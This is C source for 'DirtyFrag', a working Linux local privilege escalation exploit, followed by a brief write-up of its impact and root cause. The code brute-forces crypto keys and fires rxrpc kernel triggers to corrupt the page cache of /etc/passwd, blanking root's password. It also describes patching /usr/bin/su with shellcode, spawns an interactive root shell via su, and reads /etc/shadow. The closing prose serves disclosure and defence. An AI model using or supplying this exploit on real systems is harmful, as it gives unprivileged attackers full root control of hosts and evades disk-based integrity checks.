 *   char 6  = P_B[0]   want: '0'   (overwrites P_A[2])
 *   char 7  = P_B[1]   want: ':'   (overwrites P_A[3])
 *   char 8  = P_C[0]   want: '0'   (overwrites P_A[4]/P_B[2])
 *   char 9  = P_C[1]   want: ':'   (overwrites P_A[5]/P_B[3])
 *   char 10..14 = P_C[2..6]  want: any byte except ':' '\0' '\n'
 *   char 15 = P_C[7]   want: ':'
 *
 * The constraints on P_A[2..7] and P_B[2..7] are vacuous because they
 * are overwritten before /etc/passwd is read by anyone — we only care
 * about the final state. */
static inline int fc_check_pa_nullok(const uint8_t P[8])
{
	return P[0] == ':' && P[1] == ':';
}

static inline int fc_check_pb_nullok(const uint8_t P[8])
{
	return P[0] == '0' && P[1] == ':';
}

static inline int fc_check_pc_nullok(const uint8_t P[8])
{
	if (P[0] != '0') return 0;
	if (P[1] != ':') return 0;
	if (P[7] != ':') return 0;
	for (int i = 2; i < 7; i++) {
		if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return 0;
	}
	return 1;
}

static uint64_t fc_splitmix64(uint64_t *s)
{
	uint64_t z = (*s += 0x9E3779B97F4A7C15ULL);
	z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
	z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
	return z ^ (z >> 31);
}

/* Generic brute-force.  `predicate` decides if a P is acceptable. */
typedef int (*pcheck_fn)(const uint8_t P[8]);

static int find_K_offline_generic(const uint8_t C[8], uint64_t max_iters,
		pcheck_fn check,
		uint8_t K_out[8], uint8_t P_out[8],
		uint64_t seed_init,
		const char *label)
{
	fcrypt_uctx ctx;
	uint8_t K[8], P[8];
	uint64_t seed = seed_init;
	struct timespec ts0, ts1;
	clock_gettime(CLOCK_MONOTONIC, &ts0);

	for (uint64_t iter = 0; iter < max_iters; iter++) {
		uint64_t r = fc_splitmix64(&seed);
		memcpy(K, &r, 8);
		fcrypt_user_setkey(&ctx, K);
		fcrypt_user_decrypt(&ctx, P, C);

		if (check(P)) {
			memcpy(K_out, K, 8);
			memcpy(P_out, P, 8);
			clock_gettime(CLOCK_MONOTONIC, &ts1);
			double dt = (ts1.tv_sec - ts0.tv_sec) +
				(ts1.tv_nsec - ts0.tv_nsec) / 1e9;
			LOG("%s found after %lu iters in %.2fs (%.2fM/s) K=%02x%02x%02x%02x%02x%02x%02x%02x  P=%02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
					label,
					(unsigned long)iter, dt, iter / dt / 1e6,
					K[0],K[1],K[2],K[3],K[4],K[5],K[6],K[7],
					P[0],P[1],P[2],P[3],P[4],P[5],P[6],P[7],
					(P[0]>=32&&P[0]<127)?P[0]:'.',
					(P[1]>=32&&P[1]<127)?P[1]:'.',
					(P[2]>=32&&P[2]<127)?P[2]:'.',
					(P[3]>=32&&P[3]<127)?P[3]:'.',
					(P[4]>=32&&P[4]<127)?P[4]:'.',
					(P[5]>=32&&P[5]<127)?P[5]:'.',
					(P[6]>=32&&P[6]<127)?P[6]:'.',
					(P[7]>=32&&P[7]<127)?P[7]:'.');
			return 0;
		}

		if ((iter & 0x3ffffff) == 0 && iter > 0) {
			clock_gettime(CLOCK_MONOTONIC, &ts1);
			double dt = (ts1.tv_sec - ts0.tv_sec) +
				(ts1.tv_nsec - ts0.tv_nsec) / 1e9;
			fprintf(stderr, "  [%s %.1fs] iter=%lu (%.2fM/s)\n",
					label, dt, (unsigned long)iter, iter / dt / 1e6);
		}
	}
	return -1;
}


int rxrpc_lpe_main(int argc, char **argv)
{
	fprintf(stderr, "\n=== rxrpc/rxkad LPE EXPLOIT (uid=1000 → root) ===\n");
	fprintf(stderr, "[*] uid=%u euid=%u gid=%u\n",
			getuid(), geteuid(), getgid());

	{
		const char *no_unshare = getenv("POC_NO_UNSHARE");
		if (!no_unshare || *no_unshare != '1') {
			const char *do_unshare = getenv("POC_UNSHARE");
			if (do_unshare && *do_unshare == '1') {
				if (do_unshare_userns_netns() < 0) return 1;
			}
		}
	}

	/* Open a dummy AF_RXRPC socket to autoload the rxrpc kernel module.
	 * Without this, the first add_key("rxrpc", ...) call fails with ENODEV
	 * because the kernel key type "rxrpc" is registered by rxrpc_init() in
	 * the module load path. */
	{
		int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET);
		if (dummy < 0) {
			WARN("socket(AF_RXRPC): %s — module not loadable?", strerror(errno));
			return 1;
		}
		close(dummy);
		LOG("rxrpc module autoloaded via dummy socket(AF_RXRPC)");
	}

	/* Open /etc/passwd RO and mmap the first page (which contains the
	 * root entry on line 1). */
	const char *target_path = getenv("POC_TARGET_FILE");
	if (!target_path || !*target_path) target_path = "/etc/passwd";

	int rfd_ro = open(target_path, O_RDONLY);
	if (rfd_ro < 0) {
		WARN("open %s RO: %s", target_path, strerror(errno));
		return 1;
	}
	struct stat st;
	fstat(rfd_ro, &st);
	if (st.st_size < 32) { WARN("target too small: %lld", (long long)st.st_size); return 1; }
	LOG("target %s opened RO, size=%lld, uid=%u gid=%u mode=%04o",
			target_path, (long long)st.st_size, st.st_uid, st.st_gid,
			st.st_mode & 07777);

	/* mmap first page so the page-cache page stays pinned. */
	void *map = mmap(NULL, 4096, PROT_READ, MAP_SHARED, rfd_ro, 0);
	if (map == MAP_FAILED) { WARN("mmap: %s", strerror(errno)); return 1; }
	LOG("mmap'd %s page-cache at %p (PROT_READ|MAP_SHARED)", target_path, map);

	/* If a previous attempt already left the root entry in the patched
	 * "root::0:0:..." form, treat as success and skip the brute-force /
	 * trigger stages.  Otherwise proceed regardless of current state —
	 * the brute-force re-derives K_A/K_B/K_C from whatever bytes are
	 * currently at offsets 4/6/8 of the page-cache page, so it works
	 * even on the corrupt residue from a previous failed run. */
	{
		const char *m = (const char *)map;
		if (memcmp(m, "root::0:0", 9) == 0) {
			LOG("/etc/passwd already patched (root::0:0...) — nothing to do");
			return 0;
		}
		LOG("/etc/passwd line 1 first 16 bytes:");
		for (int i = 0; i < 16; i++)
			fprintf(stderr, "%02x ", (uint8_t)m[i]);
		fprintf(stderr, "\n");
	}
	fprintf(stderr, "[*] /etc/passwd line 1 (root entry) BEFORE: '");
	for (int i = 0; i < 32; i++) {
		char c = ((const char *)map)[i];
		fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr);
	}
	fprintf(stderr, "'\n");

	/* === STAGE 1 — THREE-SPLICE OFFLINE BRUTE FORCE ===
	 *
	 * Read THREE 8-byte ciphertexts at file offsets 4, 6, 8.  Search
	 * independently for K_A (chars 4-5 = "::"), K_B (chars 6-7 = "0:"),
	 * K_C (chars 8-15 = "0:GGGGGG:" with G non-control).  All searches
	 * are user-space only — no kernel/VM interaction.
	 *
	 * Last-write-wins ordering: trigger A first (covers 4..11), then B
	 * (covers 6..13 — overrides A's 6..11), then C (covers 8..15 —
	 * overrides A's 8..11 and B's 8..13).  Final state of chars 4..15:
	 *   chars 4..5  = P_A[0..1]
	 *   chars 6..7  = P_B[0..1]
	 *   chars 8..15 = P_C[0..7]
	 * =================================================================*/
	uint8_t Ca[8], Cb[8], Cc[8];
	int off_a = 4, off_b = 6, off_c = 8;
	if (pread(rfd_ro, Ca, 8, off_a) != 8) { WARN("pread Ca: %s", strerror(errno)); return 1; }
	if (pread(rfd_ro, Cb, 8, off_b) != 8) { WARN("pread Cb: %s", strerror(errno)); return 1; }
	if (pread(rfd_ro, Cc, 8, off_c) != 8) { WARN("pread Cc: %s", strerror(errno)); return 1; }

	LOG("Ca @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
			off_a, Ca[0],Ca[1],Ca[2],Ca[3],Ca[4],Ca[5],Ca[6],Ca[7],
			(Ca[0]>=32&&Ca[0]<127)?Ca[0]:'.', (Ca[1]>=32&&Ca[1]<127)?Ca[1]:'.',
			(Ca[2]>=32&&Ca[2]<127)?Ca[2]:'.', (Ca[3]>=32&&Ca[3]<127)?Ca[3]:'.',
			(Ca[4]>=32&&Ca[4]<127)?Ca[4]:'.', (Ca[5]>=32&&Ca[5]<127)?Ca[5]:'.',
			(Ca[6]>=32&&Ca[6]<127)?Ca[6]:'.', (Ca[7]>=32&&Ca[7]<127)?Ca[7]:'.');
	LOG("Cb @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
			off_b, Cb[0],Cb[1],Cb[2],Cb[3],Cb[4],Cb[5],Cb[6],Cb[7],
			(Cb[0]>=32&&Cb[0]<127)?Cb[0]:'.', (Cb[1]>=32&&Cb[1]<127)?Cb[1]:'.',
			(Cb[2]>=32&&Cb[2]<127)?Cb[2]:'.', (Cb[3]>=32&&Cb[3]<127)?Cb[3]:'.',
			(Cb[4]>=32&&Cb[4]<127)?Cb[4]:'.', (Cb[5]>=32&&Cb[5]<127)?Cb[5]:'.',
			(Cb[6]>=32&&Cb[6]<127)?Cb[6]:'.', (Cb[7]>=32&&Cb[7]<127)?Cb[7]:'.');
	LOG("Cc @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
			off_c, Cc[0],Cc[1],Cc[2],Cc[3],Cc[4],Cc[5],Cc[6],Cc[7],
			(Cc[0]>=32&&Cc[0]<127)?Cc[0]:'.', (Cc[1]>=32&&Cc[1]<127)?Cc[1]:'.',
			(Cc[2]>=32&&Cc[2]<127)?Cc[2]:'.', (Cc[3]>=32&&Cc[3]<127)?Cc[3]:'.',
			(Cc[4]>=32&&Cc[4]<127)?Cc[4]:'.', (Cc[5]>=32&&Cc[5]<127)?Cc[5]:'.',
			(Cc[6]>=32&&Cc[6]<127)?Cc[6]:'.', (Cc[7]>=32&&Cc[7]<127)?Cc[7]:'.');

	fcrypt_init_sboxes();
	/* selftest */
	{
		fcrypt_uctx ctx;
		uint8_t z[8] = {0};
		uint8_t cv[8] = { 0x0E, 0x09, 0x00, 0xC7, 0x3E, 0xF7, 0xED, 0x41 };
		uint8_t pv[8];
		fcrypt_user_setkey(&ctx, z);
		fcrypt_user_decrypt(&ctx, pv, cv);
		if (memcmp(pv, z, 8) != 0) { WARN("fcrypt selftest FAILED"); return 1; }
	}
	LOG("fcrypt selftest OK");

	uint8_t Ka[8], Pa_out[8];
	uint8_t Kb[8], Pb_out[8];
	uint8_t Kc[8], Pc_out[8];
	uint8_t Cb_actual[8], Cc_actual[8];

	{
		uint64_t max_iters = 10000000000ULL;
		const char *e = getenv("LPE_MAX_ITERS");
		if (e) max_iters = strtoull(e, NULL, 0);
		uint64_t seed_base = (uint64_t)time(NULL) * 0x100000001ULL ^ (uint64_t)getpid();
		const char *se = getenv("LPE_SEED");
		if (se) seed_base = strtoull(se, NULL, 0);

		fprintf(stderr, "\n=== STAGE 1a: search K_A (chars 4-5 := \"::\")  prob ~1.5e-5 ===\n");
		if (find_K_offline_generic(Ca, max_iters, fc_check_pa_nullok,
					Ka, Pa_out, seed_base, "K_A") != 0) {
			WARN("K_A search exhausted"); return 2;
		}

		/* After splice A is applied, the ciphertext that splice B will
		 * see at file offset 6 is NOT the original Cb — it's the bytes
		 * that splice A wrote to file offsets 6..11 (= Pa[2..7]) plus
		 * the original bytes 12..13 (= Cb[6..7]).  We must derive
		 * Cb_actual and search K_B against it. */
		memcpy(Cb_actual, Pa_out + 2, 6);
		memcpy(Cb_actual + 6, Cb + 6, 2);
		LOG("Cb_actual (after splice A) = %02x%02x%02x%02x%02x%02x%02x%02x",
				Cb_actual[0],Cb_actual[1],Cb_actual[2],Cb_actual[3],
				Cb_actual[4],Cb_actual[5],Cb_actual[6],Cb_actual[7]);

		fprintf(stderr, "\n=== STAGE 1b: search K_B (chars 6-7 := \"0:\")  prob ~1.5e-5 ===\n");
		if (find_K_offline_generic(Cb_actual, max_iters, fc_check_pb_nullok,
					Kb, Pb_out, seed_base ^ 0xa5a5a5a5a5a5a5a5ULL,
					"K_B") != 0) {
			WARN("K_B search exhausted"); return 2;
		}

		/* Same chaining logic for splice C: after splice B, file offsets
		 * 8..13 hold Pb[2..7]; offsets 14..15 still hold the original
		 * bytes Cc[6..7]. */
		memcpy(Cc_actual, Pb_out + 2, 6);
		memcpy(Cc_actual + 6, Cc + 6, 2);
		LOG("Cc_actual (after splice B) = %02x%02x%02x%02x%02x%02x%02x%02x",
				Cc_actual[0],Cc_actual[1],Cc_actual[2],Cc_actual[3],
				Cc_actual[4],Cc_actual[5],Cc_actual[6],Cc_actual[7]);

		fprintf(stderr, "\n=== STAGE 1c: search K_C (chars 8-15 := \"0:GGGGGG:\")  prob ~5.4e-8 ===\n");
		if (find_K_offline_generic(Cc_actual, max_iters, fc_check_pc_nullok,
					Kc, Pc_out, seed_base ^ 0x5a5a5a5a5a5a5a5aULL,
					"K_C") != 0) {
			WARN("K_C search exhausted"); return 2;
		}
	}

	fprintf(stderr, "\n[+] Predicted post-corruption /etc/passwd line 1:\n    \"root");
	/* chars 4-5 from P_A */
	for (int i = 0; i < 2; i++) fputc((Pa_out[i]>=32&&Pa_out[i]<127)?Pa_out[i]:'.', stderr);
	/* chars 6-7 from P_B */
	for (int i = 0; i < 2; i++) fputc((Pb_out[i]>=32&&Pb_out[i]<127)?Pb_out[i]:'.', stderr);
	/* chars 8-15 from P_C */
	for (int i = 0; i < 8; i++) fputc((Pc_out[i]>=32&&Pc_out[i]<127)?Pc_out[i]:'.', stderr);
	fprintf(stderr, "/root:/bin/bash\"\n");

	/* === STAGE 2 — THREE KERNEL TRIGGERS (in order A → B → C) ===
	 * Each trigger does a single in-place decrypt at the
	 * indicated /etc/passwd file offset.  Last-write-wins on overlapping
	 * bytes determines the final state.
	 */
	fprintf(stderr, "\n=== STAGE 2a: kernel trigger A @ off %d (set chars 4-5 \"::\") ===\n", off_a);
	memcpy(SESSION_KEY, Ka, 8);
	if (do_one_trigger(rfd_ro, off_a, 8) < 0) {
		WARN("kernel trigger A failed"); return 3;
	}

	fprintf(stderr, "\n=== STAGE 2b: kernel trigger B @ off %d (set chars 6-7 \"0:\") ===\n", off_b);
	memcpy(SESSION_KEY, Kb, 8);
	if (do_one_trigger(rfd_ro, off_b, 8) < 0) {
		WARN("kernel trigger B failed"); return 3;
	}

	fprintf(stderr, "\n=== STAGE 2c: kernel trigger C @ off %d (set chars 8-15 \"0:GGGGGG:\") ===\n", off_c);
	memcpy(SESSION_KEY, Kc, 8);
	if (do_one_trigger(rfd_ro, off_c, 8) < 0) {
		WARN("kernel trigger C failed"); return 3;
	}

	/* Verify: re-read line 1 of /etc/passwd via mmap. */
	fprintf(stderr, "[*] /etc/passwd line 1 (root entry) AFTER:  '");
	for (int i = 0; i < 32; i++) {
		char c = ((const char *)map)[i];
		fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr);
	}
	fprintf(stderr, "'\n");

	/* Sanity-check: chars 4-5 = "::", 6-7 = "0:", 8-9 = "0:", 15 = ':'. */
	{
		const char *m = (const char *)map;
		int ok = (m[4] == ':' && m[5] == ':' &&
				m[6] == '0' && m[7] == ':' &&
				m[8] == '0' && m[9] == ':' &&
				m[15] == ':');
		if (!ok) {
			WARN("post-trigger sanity check failed — char layout off");
			return 4;
		}
	}
	fprintf(stderr,
			"\n[!!!] HIT — root entry now has empty passwd field, uid=0, "
			"gid=0, dir=/root, shell=/bin/bash.\n");

	/* === STAGE 3 — VERIFY VIA getent passwd root === */
	fprintf(stderr,
			"\n=== STAGE 3: independent verify via `getent passwd root` ===\n");
	{
		int p[2];
		if (pipe(p) == 0) {
			pid_t pid = fork();
			if (pid == 0) {
				close(p[0]);
				dup2(p[1], 1);
				dup2(p[1], 2);
				close(p[1]);
				execlp("getent", "getent", "passwd", "root", NULL);
				_exit(127);
			}
			close(p[1]);
			char buf[1024];
			ssize_t r = read(p[0], buf, sizeof(buf) - 1);
			close(p[0]);
			int wstatus = 0;
			waitpid(pid, &wstatus, 0);
			if (r > 0) {
				buf[r] = 0;
				fprintf(stderr, "[getent passwd root] %s", buf);
			}
			fprintf(stderr,
					"[+] PRIMITIVE proven: root entry has empty passwd field "
					"via NSS.\n");
		}
	}

	/* Honour `--corrupt-only` arg or DIRTYFRAG_CORRUPT_ONLY=1 env so
	 * the chain wrapper can skip the in-process su PTY stage and exec
	 * /usr/bin/su itself.  Avoids the flaky posix_openpt bridge. */
	{
		int co_flag = 0;
		for (int i = 1; i < argc; i++)
			if (!strcmp(argv[i], "--corrupt-only")) { co_flag = 1; break; }
		const char *e = getenv("DIRTYFRAG_CORRUPT_ONLY");
		if (e && *e == '1') co_flag = 1;
		if (co_flag) return 0;
	}

	/* === STAGE 4 — `su` (target=root, no password input) ===
	 * PAM common-auth contains "auth [success=2 default=ignore]
	 * pam_unix.so nullok" — so a target user with empty passwd field
	 * + nullok flag accepts an empty password.  We auto-inject a
	 * single newline on the "Password:" prompt and then bridge the
	 * resulting bash to the user's tty. */
	fprintf(stderr,
			"\n=== STAGE 4: spawning interactive root shell via `su` "
			"(no password input needed) ===\n\n");
	fflush(stderr);

	int master = posix_openpt(O_RDWR | O_NOCTTY);
	if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0) {
		WARN("posix_openpt: %s", strerror(errno));
		return 5;
	}
	char *slave_name = ptsname(master);

	struct winsize ws;
	if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0) {
		ioctl(master, TIOCSWINSZ, &ws);
	}

	pid_t pid = fork();
	if (pid < 0) { WARN("fork: %s", strerror(errno)); return 5; }
	if (pid == 0) {
		/* child */
		setsid();
		int slave = open(slave_name, O_RDWR);
		if (slave < 0) _exit(127);
		ioctl(slave, TIOCSCTTY, 0);
		dup2(slave, 0); dup2(slave, 1); dup2(slave, 2);
		if (slave > 2) close(slave);
		close(master);
		/* `su` with no args targets root.  PAM common-auth's pam_unix.so
		 * nullok accepts the empty passwd we planted in /etc/passwd. */
		execlp("su", "su", NULL);
		_exit(127);
	}

	/* parent: bridge user's tty <-> master. */
	struct termios saved_termios;
	int saved_termios_ok = (tcgetattr(STDIN_FILENO, &saved_termios) == 0);
	if (saved_termios_ok) {
		struct termios raw = saved_termios;
		cfmakeraw(&raw);
		tcsetattr(STDIN_FILENO, TCSANOW, &raw);
	}

	int auto_pw_sent = 0;
	int stdin_eof = 0;          /* set when stdin closes (e.g. /dev/null) */
	char buf[4096];
	/* If LPE_AUTO_VERIFY=1 is set, the bridge will inject
	 * `id; whoami; exit\n` so it can prove uid=0 non-interactively
	 * (e.g. when stdin is /dev/null in CI). */
	int auto_verify = 0;
	{
		const char *e = getenv("LPE_AUTO_VERIFY");
		if (e && *e == '1') auto_verify = 1;
	}
	int verify_sent = 0;
	int total_ms = 0;
	for (;;) {
		struct pollfd pfds[2] = {
			{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },
			{ master,       POLLIN, 0 },
		};
		int pr = poll(pfds, 2, 200);
		if (pr < 0 && errno != EINTR) break;
		total_ms += 200;

		if (pfds[1].revents & POLLIN) {
			ssize_t n = read(master, buf, sizeof(buf));
			if (n <= 0) break;
			(void)write(STDOUT_FILENO, buf, n);
			if (!auto_pw_sent && (size_t)n < sizeof(buf)) {
				buf[n] = 0;
				if (strstr(buf, "Password") || strstr(buf, "password")) {
					/* Empty password — PAM nullok will accept it.
					 * (When pam_unix sees an empty passwd field plus
					 * nullok it skips the prompt entirely; this branch
					 * handles the case where some other PAM module
					 * prints a prompt anyway.) */
					(void)write(master, "\n", 1);
					auto_pw_sent = 1;
				}
			}
		}
		if (!stdin_eof && (pfds[0].revents & POLLIN)) {
			ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
			if (n <= 0) {
				/* stdin EOF — stop reading from it but keep bridging
				 * master → stdout so su can still finish auth and run
				 * the optional auto-verify command. */
				stdin_eof = 1;
			} else {
				(void)write(master, buf, n);
			}
		}
		if (pfds[1].revents & (POLLHUP | POLLERR)) break;

		/* Auto-verify: ~1 s after spawn, send `id; whoami; exit\n` so
		 * the bridge captures uid=0 evidence non-interactively even
		 * when pam_unix's blank-passwd path skips the prompt. */
		if (auto_verify && !verify_sent && total_ms >= 1000) {
			const char cmd[] = "id; whoami; cat /etc/shadow | head -2; exit\n";
			(void)write(master, cmd, sizeof(cmd) - 1);
			verify_sent = 1;
		}

		int status;
		pid_t w = waitpid(pid, &status, WNOHANG);
		if (w == pid) {
			for (int i = 0; i < 5; i++) {
				struct pollfd pf = { master, POLLIN, 0 };
				if (poll(&pf, 1, 50) <= 0) break;
				ssize_t n = read(master, buf, sizeof(buf));
				if (n <= 0) break;
				(void)write(STDOUT_FILENO, buf, n);
			}
			break;
		}
	}
	if (saved_termios_ok) {
		tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);
	}
	close(master);
	return 0;
}
/*
 * DirtyFrag chain — uid=1000 → root.
 *
 * 1. ESP path  (authencesn AF_ALG --corrupt-only): overwrites the first
 *    160 bytes of /usr/bin/su's page-cache with a static x86_64 root-
 *    shell ELF.  Works on every distro tested regardless of PAM nullok
 *    or /etc/passwd contents — once invoked, the patched setuid-root
 *    /usr/bin/su just execs /bin/sh as uid 0.
 *
 * 2. rxrpc path  (Ubuntu fallback): if AF_ALG is sandboxed and the ESP
 *    path can't reach the page cache, fall back to the rxrpc/rxkad
 *    nullok primitive that patches /etc/passwd's root entry empty.
 *    PAM nullok then accepts the empty password during `su -`.
 *
 * 3. Once either target is corrupted, spawn `/usr/bin/su -` inside a
 *    fresh PTY and bridge the user's tty to it.  The bridge handles
 *    both the patched-su (no PAM at all) and the patched-passwd (PAM
 *    nullok) cases uniformly, and works even when the caller is in a
 *    background process group of an ssh-allocated PTY.
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <poll.h>
#include <signal.h>
#include <termios.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdint.h>

extern int su_lpe_main(int argc, char **argv);
extern int rxrpc_lpe_main(int argc, char **argv);

/*
 * The 8 bytes our su payload places at file offset 0x78 — the first
 * instructions of the embedded shell ELF.  Sequence:
 *   31 ff   xor edi, edi
 *   31 f6   xor esi, esi
 *   31 c0   xor eax, eax
 *   b0 6a   mov al, 0x6a   (setgid)
 * Distros' original /usr/bin/su has different bytes here, so this is
 * a reliable post-patch marker.
 *
 * (We don't check offset 0 because /usr/bin/su already has the ELF
 * magic there — both before and after we patch.)
 */
static const uint8_t su_marker[8] = {
	0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,
};

static int su_already_patched(void)
{
	int fd = open("/usr/bin/su", O_RDONLY);
	if (fd < 0)
		return 0;
	uint8_t got[8];
	ssize_t n = pread(fd, got, sizeof(got), 0x78);
	close(fd);
	if (n != sizeof(got))
		return 0;
	return memcmp(got, su_marker, sizeof(su_marker)) == 0;
}

static int passwd_already_patched(void)
{
	int fd = open("/etc/passwd", O_RDONLY);
	if (fd < 0)
		return 0;
	char head[16];
	ssize_t n = pread(fd, head, sizeof(head), 0);
	close(fd);
	if (n < 9)
		return 0;
	return memcmp(head, "root::0:0", 9) == 0;
}

static int either_target_patched(void)
{
	return su_already_patched() || passwd_already_patched();
}

static void silence_stderr(int *saved_fd)
{
	*saved_fd = dup(STDERR_FILENO);
	int dn = open("/dev/null", O_WRONLY);
	if (dn >= 0) {
		dup2(dn, STDERR_FILENO);
		close(dn);
	}
}

static void restore_stderr(int saved_fd)
{
	if (saved_fd >= 0) {
		dup2(saved_fd, STDERR_FILENO);
		close(saved_fd);
	}
}

static char **append_corrupt_only(int argc, char **argv, int *new_argc)
{
	static char *flag = "--corrupt-only";
	static char *buf[64];
	int n = argc < 60 ? argc : 60;
	for (int i = 0; i < n; i++)
		buf[i] = argv[i];
	buf[n] = flag;
	buf[n + 1] = NULL;
	*new_argc = n + 1;
	return buf;
}

static void exec_su_login(void)
{
	const char *paths[] = {
		"/bin/su", "/usr/bin/su", "/sbin/su", "/usr/sbin/su", NULL,
	};
	for (int i = 0; paths[i]; i++)
		execl(paths[i], "su", "-", (char *)NULL);
	execlp("su", "su", "-", (char *)NULL);
}

/*
 * Spawn `/usr/bin/su -` in a fresh PTY and bridge our tty to it.
 */
static int run_root_pty(void)
{
	int master = posix_openpt(O_RDWR | O_NOCTTY);
	if (master < 0)
		return -1;
	if (grantpt(master) < 0 || unlockpt(master) < 0) {
		close(master);
		return -1;
	}
	char *slave_name = ptsname(master);
	if (!slave_name) {
		close(master);
		return -1;
	}

	struct winsize ws;
	if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0)
		ioctl(master, TIOCSWINSZ, &ws);

	pid_t pid = fork();
	if (pid < 0) {
		close(master);
		return -1;
	}
	if (pid == 0) {
		setsid();
		int slave = open(slave_name, O_RDWR);
		if (slave < 0)
			_exit(127);
		ioctl(slave, TIOCSCTTY, 0);
		dup2(slave, 0);
		dup2(slave, 1);
		dup2(slave, 2);
		if (slave > 2)
			close(slave);
		close(master);
		exec_su_login();
		_exit(127);
	}

	signal(SIGTTOU, SIG_IGN);
	signal(SIGTTIN, SIG_IGN);
	signal(SIGPIPE, SIG_IGN);
	signal(SIGHUP,  SIG_IGN);
	(void)setpgid(0, 0);
	(void)tcsetpgrp(STDIN_FILENO, getpid());

	struct termios saved_termios;
	int restore_termios = 0;
	if (tcgetattr(STDIN_FILENO, &saved_termios) == 0) {
		struct termios raw = saved_termios;
		cfmakeraw(&raw);
		if (tcsetattr(STDIN_FILENO, TCSANOW, &raw) == 0)
			restore_termios = 1;
	}

	int auto_pw_sent = 0;
	int stdin_eof = 0;
	int saw_master_output = 0;
	int total_ms = 0;
	char buf[4096];

	for (;;) {
		struct pollfd pfds[2] = {
			{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },
			{ master,                        POLLIN, 0 },
		};
		int pr = poll(pfds, 2, 200);
		if (pr < 0 && errno != EINTR)
			break;
		total_ms += 200;

		if (pfds[1].revents & POLLIN) {
			ssize_t n = read(master, buf, sizeof(buf));
			if (n <= 0)
				break;
			saw_master_output = 1;
			(void)write(STDOUT_FILENO, buf, n);
			if (!auto_pw_sent && n < (ssize_t)sizeof(buf)) {
				buf[n] = 0;
				if (strstr(buf, "Password") ||
						strstr(buf, "password")) {
					(void)write(master, "\n", 1);
					auto_pw_sent = 1;
				}
			}
		}
		if (!stdin_eof && (pfds[0].revents & POLLIN)) {
			ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
			if (n <= 0)
				stdin_eof = 1;
			else
				(void)write(master, buf, n);
		}
		if (pfds[1].revents & (POLLHUP | POLLERR))
			break;

		if (!auto_pw_sent && !saw_master_output && total_ms >= 1500) {
			(void)write(master, "\n", 1);
			auto_pw_sent = 1;
		}

		int status;
		pid_t w = waitpid(pid, &status, WNOHANG);
		if (w == pid) {
			for (int i = 0; i < 5; i++) {
				struct pollfd pf = { master, POLLIN, 0 };
				if (poll(&pf, 1, 50) <= 0)
					break;
				ssize_t n = read(master, buf, sizeof(buf));
				if (n <= 0)
					break;
				(void)write(STDOUT_FILENO, buf, n);
			}
			break;
		}
	}

	if (restore_termios)
		tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);
	close(master);
	return 0;
}

int main(int argc, char **argv)
{
	int verbose = (getenv("DIRTYFRAG_VERBOSE") != NULL);
	int force_esp = 0, force_rxrpc = 0;
	int saved_err = -1;
	int rc = 1;
	int new_argc;
	char **co_argv;

	for (int i = 1; i < argc; i++) {
		if (!strcmp(argv[i], "--force-esp"))
			force_esp = 1;
		else if (!strcmp(argv[i], "--force-rxrpc"))
			force_rxrpc = 1;
		else if (!strcmp(argv[i], "-v") ||
				!strcmp(argv[i], "--verbose"))
			verbose = 1;
	}

	if (getuid() == 0) {
		execlp("/bin/bash", "bash", (char *)NULL);
		_exit(1);
	}

	co_argv = append_corrupt_only(argc, argv, &new_argc);

	if (!verbose)
		silence_stderr(&saved_err);

	if (force_rxrpc) {
		rc = rxrpc_lpe_main(new_argc, co_argv);
		for (int i = 0; !passwd_already_patched() && i < 3; i++)
			rc = rxrpc_lpe_main(new_argc, co_argv);
	} else if (force_esp) {
		rc = su_lpe_main(new_argc, co_argv);
	} else {
		rc = su_lpe_main(new_argc, co_argv);
		if (!su_already_patched()) {
			rc = rxrpc_lpe_main(new_argc, co_argv);
			for (int i = 0; !passwd_already_patched() && i < 3; i++)
				rc = rxrpc_lpe_main(new_argc, co_argv);
		}
	}

	int patched = either_target_patched();

	if (!verbose)
		restore_stderr(saved_err);

	if (patched) {
		(void)run_root_pty();
		return 0;
	}

	dprintf(2, "dirtyfrag: failed (rc=%d)\n", rc);
	return rc ? rc : 1;
}

Impact

The main impact is local privilege escalation to root. Any attacker who already has code execution as an unprivileged local user may be able to become root. This includes:

compromised SSH accounts;
malicious users on shared servers;
compromised web applications with local shell access;
container escape chains where the attacker can reach a vulnerable host kernel path;
post-exploitation scenarios after an initial RCE.

Dirty Frag is not a remote network vulnerability by itself. The attacker needs local code execution. However, once local code execution exists, the vulnerability can turn a low-privileged foothold into full host compromise.

Another important impact is forensic ambiguity. Like Dirty Pipe and Copy Fail, the modification is page-cache based. The disk file may remain unchanged, while reads and executions observe the corrupted in-memory version. Traditional file integrity monitoring that only hashes files on disk may miss the temporary in-memory corruption. Public coverage of the related Copy Fail flaw made the same point: page-cache corruption may leave no obvious disk trace.

Why This Happened

Dirty Frag is a classic example of a cross-subsystem kernel bug. No single component looks obviously malicious in isolation:

splice() is designed for efficient zero-copy movement of data.
skb fragments are designed to avoid unnecessary packet copies.
in-place crypto is a performance optimization.
page cache is designed to avoid repeated disk reads.
XFRM and RxRPC assume their input buffers are safe to modify under certain conditions.

